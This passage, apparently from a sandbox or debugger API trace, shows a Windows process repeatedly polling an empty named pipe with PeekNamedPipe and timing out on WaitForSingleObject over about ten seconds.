lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.530] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.561] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.561] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0094.639] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.639] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0094.790] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.790] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0094.863] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.863] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0094.899] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.899] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0094.932] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.932] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0094.949] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.949] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.001] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.001] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.029] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.029] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.268] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.268] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.476] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.477] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.495] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.495] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.526] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.526] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0095.557] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.558] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0096.479] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.479] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0096.858] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.858] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0096.888] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.888] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0096.915] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.915] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0096.947] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.947] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0096.988] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.988] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.009] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.009] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.040] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.040] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.076] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.076] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.102] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.102] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.134] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.134] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.165] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.165] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.196] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.196] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.227] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.227] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.276] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.276] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.305] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.305] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.694] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.694] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0097.711] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.711] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0098.931] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0098.931] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0099.394] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0099.394] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0099.413] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0099.413] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0100.234] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.234] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0100.325] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.325] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0100.444] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.444] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0100.530] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.530] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0100.612] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.613] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0100.646] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.655] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0101.160] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.160] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0101.210] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.211] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0101.237] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.237] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0101.297] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.298] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.048] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.366] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.391] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.391] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.422] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.422] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.454] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.454] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.484] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.484] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.517] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.517] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.546] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.546] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.579] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.579] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.609] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.609] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.642] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.642] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.671] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.671] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.703] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.703] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.734] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.734] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.767] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.767] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.796] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.796] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.828] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.828] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.859] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.859] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.890] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.890] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.921] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.921] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.954] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.954] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0102.984] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.984] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.015] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.015] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.051] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.051] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0103.078] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: 